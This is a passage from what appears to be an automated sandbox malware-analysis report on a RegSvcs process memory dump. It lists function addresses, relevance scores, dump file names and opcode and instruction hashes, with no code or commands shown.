                                                                                            • Opcode Fuzzy Hash: 04f29cce58fdb21ddfb4bb4f6f5d0b0726d06ab45f9113f7f62a9d42cbbf3c20
                                                                                            • Instruction Fuzzy Hash: E401C4B75415009BC362DF1C9C81F56B7E8EB85770B1542A5E9E8DB1A6D730EC01D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b2a8200abfc63c145da5b23b5d9f9f52104125656533d8a37278b1969aac893
                                                                                            • Instruction ID: 82eeac7447c6c987ecaf1c71feb7dc4a6f0ecfe9904aef005cce10c6325894ba
                                                                                            • Opcode Fuzzy Hash: 2b2a8200abfc63c145da5b23b5d9f9f52104125656533d8a37278b1969aac893
                                                                                            • Instruction Fuzzy Hash: 6411AD32641240EFCB15EF19DD81F56BBB8FF48B94F2000A5FA059B662C639ED01DA90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F76259 Relevance: .1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e2e7ca2c816b5dc992c94994cc08902dfb59360b71f825ce6a523dc23effe2d
                                                                                            • Instruction ID: 0729d4c72c8b8783ef0b50960756580002efdc475b52d3082ce6a04b982bda04
                                                                                            • Opcode Fuzzy Hash: 0e2e7ca2c816b5dc992c94994cc08902dfb59360b71f825ce6a523dc23effe2d
                                                                                            • Instruction Fuzzy Hash: E0119A70941228ABDF65AB64CC42FE8B3B4AF48710F508195B328A60E1DB749E81EF84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F7208A Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                            • Instruction ID: 27c95169a1cda01d74a591b266fbc5d5df5e452adb5d5c5b22ae9febbf770e54
                                                                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                            • Instruction Fuzzy Hash: 1B012433A001018BDF549A29D880F92B776BFD4720F6580BAED09CF246DA71DC81F3A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF6050 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3171fe4c4ca85c2843447f078a169ff7c42e945cd1a1255ce0bcd0b7373aae3f
                                                                                            • Instruction ID: 64e9c9939d2603a9e9e50f12000f8022812d599eb06c90286beb0f3c982a0240
                                                                                            • Opcode Fuzzy Hash: 3171fe4c4ca85c2843447f078a169ff7c42e945cd1a1255ce0bcd0b7373aae3f
                                                                                            • Instruction Fuzzy Hash: 9F11177390001DABCB11DB94CC85EEFBB7CEF48358F044166E906E7211EA34AA15DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01006500 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a31ee2764779366a7dcbf0fb0f92ffd97f1c7cdc37904bb3f7407fd32357c339
                                                                                            • Instruction ID: 42df2362b01bc066a625c21f2045ab388a5cdb3067242fe9dffc1cb851fdda87
                                                                                            • Opcode Fuzzy Hash: a31ee2764779366a7dcbf0fb0f92ffd97f1c7cdc37904bb3f7407fd32357c339
                                                                                            • Instruction Fuzzy Hash: F811A5326441459FD712CF58D800BA5B7F6FB5A314F088199E8848B355D733EC85CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFC810 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6a97f4405b8f6d684d2e95606eac4adc40c6aa20ea0c9565eccaf09376ebdb71
                                                                                            • Instruction ID: ba80d8a5c994411e0afe414c39a0bebcefe2969d1268ed476fe8b99303be3e12
                                                                                            • Opcode Fuzzy Hash: 6a97f4405b8f6d684d2e95606eac4adc40c6aa20ea0c9565eccaf09376ebdb71
                                                                                            • Instruction Fuzzy Hash: 1511ECB1E0021D9BCB04DF9AD541AAEB7F4EF48750F10406AF905E7351D674EE01DBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB20F0 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8a175f5039ca76341371d24f0bfeb3a2213f84f3a92b78434aa7bca5d6776962
                                                                                            • Instruction ID: a1c7a4b927eea67b623dde23e43a991d3e50481a8c9f218dc2aa14879a165dd2
                                                                                            • Opcode Fuzzy Hash: 8a175f5039ca76341371d24f0bfeb3a2213f84f3a92b78434aa7bca5d6776962
                                                                                            • Instruction Fuzzy Hash: 8511A971A0120CABCB00EFA9CC41FAE7BB5EF44740F104058F9019B291DA39AE01EF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6C020 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                            • Instruction ID: 245cc2d123e9520ea64f8c8da2080057a0b59d4fe50ba2ad32df2bb14e777aec
                                                                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                            • Instruction Fuzzy Hash: C201F972500705EFDB22A665CA00FB773E9FFC4310F54482DA585C7540DA74E802E750
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAE5CF Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7bfe9c1c4197ec3498983e32f6ec36898963d3cf94f7d4a46eaf3e7d3fe6d13
                                                                                            • Instruction ID: 09a97c57961e788db12fae81ff8caf966dedc0bbe3e3fc9daf9bdec814f12221
                                                                                            • Opcode Fuzzy Hash: d7bfe9c1c4197ec3498983e32f6ec36898963d3cf94f7d4a46eaf3e7d3fe6d13
                                                                                            • Instruction Fuzzy Hash: 8A018FB2641A40BFC651BB79CD81E97B7ECFB857A0B040629B10497A62DB68FC01D7B0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010069C0 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 42f0983a8dc611a3fe517c0de8753c58686656c77eedb55ea69fd103c9c7a05c
                                                                                            • Instruction ID: 148329448bcf51e53069636fb1b4332ec46eb3dd3c188cb9c9115aa0238b5f91
                                                                                            • Opcode Fuzzy Hash: 42f0983a8dc611a3fe517c0de8753c58686656c77eedb55ea69fd103c9c7a05c
                                                                                            • Instruction Fuzzy Hash: 60014C322142029BD320EF6EC8499ABBBE9EF49720F104129F9988B1C0E735A951CBD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFC460 Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b8fedf6c3b25633095dd96b85696c3bba89c53c065c253c4666a7770d7420ba8
                                                                                            • Instruction ID: 6e04b9a2ad56d651b28ca0f6e0a86e1b77e12239acaf69ebbbd66e586b82f651
                                                                                            • Opcode Fuzzy Hash: b8fedf6c3b25633095dd96b85696c3bba89c53c065c253c4666a7770d7420ba8
                                                                                            • Instruction Fuzzy Hash: 37115771A0121CABCB15EFA4C951EAE7BB5EF48750F104059FD01973A1DA39EE11EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFC97C Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2bbd2cc6c9c07faf4b2b6068eda1cbf7017a80aaa3d5af4716001c84656969b1
                                                                                            • Instruction ID: 7f8a6d909064d308da0c5270cc7056514a7b85705d091ab5cac800c59e683151
                                                                                            • Opcode Fuzzy Hash: 2bbd2cc6c9c07faf4b2b6068eda1cbf7017a80aaa3d5af4716001c84656969b1
                                                                                            • Instruction Fuzzy Hash: 4E118EB16043089FC710DF69C94299BBBE4EF88710F00451EF998D7361D634E900CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFCA11 Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 247d483f4b5e2309a3e367e0f80106396845564c9a06f73c81e7b149c35ca314
                                                                                            • Instruction ID: a90e8f3a14d1b3dbe9c1ec172de22419aa064093bf421488f5186a43e0a83f89
                                                                                            • Opcode Fuzzy Hash: 247d483f4b5e2309a3e367e0f80106396845564c9a06f73c81e7b149c35ca314
                                                                                            • Instruction Fuzzy Hash: 12118EB16043089FC300DF6AC94199BBBE4EF89750F00851EF958D7361E634E900DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F8E016 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                            • Instruction ID: 399505ed6da505bd6d670255d3353cf182d8a0737dd27efe4b10b2cb30d5c0da
                                                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                            • Instruction Fuzzy Hash: BB01BC326045849FD322A71CCA08F6677DCEF45B68F1D08A5F805CB6A2C7A8DC40E721
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6826B Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 882687159cfbe7b18e9976dd61d5f16cf75ea826e41d7bb7c94a3c91291a7713
                                                                                            • Instruction ID: e54dce9199fe01dbf532154144a95c8e2df2a20494b8249a25733aa107bc4773
                                                                                            • Opcode Fuzzy Hash: 882687159cfbe7b18e9976dd61d5f16cf75ea826e41d7bb7c94a3c91291a7713
                                                                                            • Instruction Fuzzy Hash: 8F01F272B00508DBC714EB6ADC11ABE77B9FF80760F15812DE901AB252EE30ED02E690
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101EB50 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e30b6820944f008bddf0fbe3f52135706a378506ee99f437c6ee484c484b2dd6
                                                                                            • Instruction ID: 6823ed6cff2283dbb9d9ee7e39be85a7b3de900f346c5d54a9d18ba501b9a437
                                                                                            • Opcode Fuzzy Hash: e30b6820944f008bddf0fbe3f52135706a378506ee99f437c6ee484c484b2dd6
                                                                                            • Instruction Fuzzy Hash: 3801A7712407009FD3325B15DC41F4BBAE8FF45B50F110429F6859F395D6B9A8409B94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F72582 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e871b665f0cd5dfb3c66d72812aa1e3070f08b65227ec1f8aa67c5edd499db4b
                                                                                            • Instruction ID: a11f35e3bcab383184cc33792b844799f514e76d60cb648ad4e2687f381c5015
                                                                                            • Opcode Fuzzy Hash: e871b665f0cd5dfb3c66d72812aa1e3070f08b65227ec1f8aa67c5edd499db4b
                                                                                            • Instruction Fuzzy Hash: A2F0A433A41A20B7C7319B56CD41F57BAAAEB84FA0F15802AB50997650DA34ED01EBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9C073 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction ID: 0c30b1d7462c814b172af066c025a7457cb6ddfdb1af398f560cfca98a45c0cc
                                                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction Fuzzy Hash: 67F0C2B2A00A10ABD324DF4DDC41E57F7EADFC0B90F048128A605C7220EA31DD04CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0104634F Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
